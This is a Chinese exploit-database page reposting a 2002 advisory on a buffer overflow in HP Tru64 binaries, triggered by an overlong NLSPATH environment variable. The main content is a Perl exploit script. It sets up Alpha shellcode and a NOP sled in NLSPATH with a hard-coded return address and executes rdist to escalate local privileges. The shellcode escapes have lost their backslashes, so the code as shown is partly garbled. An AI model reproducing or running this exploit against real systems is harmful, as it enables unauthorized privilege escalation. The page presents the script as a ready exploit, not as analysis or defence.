HP Tru64 – NLSPATH Environment Variable Local Buffer Overflow (2)
漏洞ID | 1053613 | 漏洞类型 | |
发布时间 | 2002-08-30 | 更新时间 | 2002-08-30 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Unix | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/5647/info
Tru64 is a commercially available UNIX operating system. Tru64 was originally developed by Digital and is now distributed and maintained by HP.
A buffer overflow has been discovered in a number of Tru64 binaries. Attackers may exploit this via an overly long value for the NLSPATH environment variable. Because of this flaw, a local attacker may be able to execute arbitrary instructions. As a result, the attacker may be able to execute malicious code and elevate privileges.
#!/usr/bin/perl -w
#
# based on work by stripey from back in the day
# kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com
$sc .= "x30x15xd9x43x11x74xf0x47x12x14x02x42";
$sc .= "xfcxffx32xb2x12x94x09x42xfcxffx32xb2";
$sc .= "xffx47x3fx26x1fx04x31x22xfcxffx30xb2";
$sc .= "xf7xffx1fxd2x10x04xffx47x11x14xe3x43";
$sc .= "x20x35x20x42xffxffxffxffx30x15xd9x43";
$sc .= "x31x15xd8x43x12x04xffx47x40xffx1exb6";
$sc .= "x48xffxfexb7x98xffx7fx26xd0x8cx73x22";
$sc .= "x13x05xf3x47x3cxffx7exb2x69x6ex7fx26";
$sc .= "x2fx62x73x22x38xffx7exb2x13x94xe7x43";
$sc .= "x20x35x60x42xffxffxffxff";
print "Shellcode is " . length($sc) . " bytes long n";
$tlen = (1024-(length($sc)))/4;
$ENV{"NLSPATH"} = "";
system("ulimit -c 10000");
# 0x14001019a Compaq Tru64 UNIX V5.0 (Rev. 910) (TruNastyWhore.localdomain)
$ret = "x9ax01x01x40x01";
$ENV{"NLSPATH"}= pack("l",0x47ff041f) x ($tlen) . $sc . $ret;
exec("/usr/bin/rdist -c DMr0x");
相关推荐: xtell User Status Remote Information Disclosure Vulnerability
xtell User Status Remote Information Disclosure Vulnerability 漏洞ID 1102398 漏洞类型 Design Error 发布时间 2002-02-27 更新时间 2002-02-27 CVE编号…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666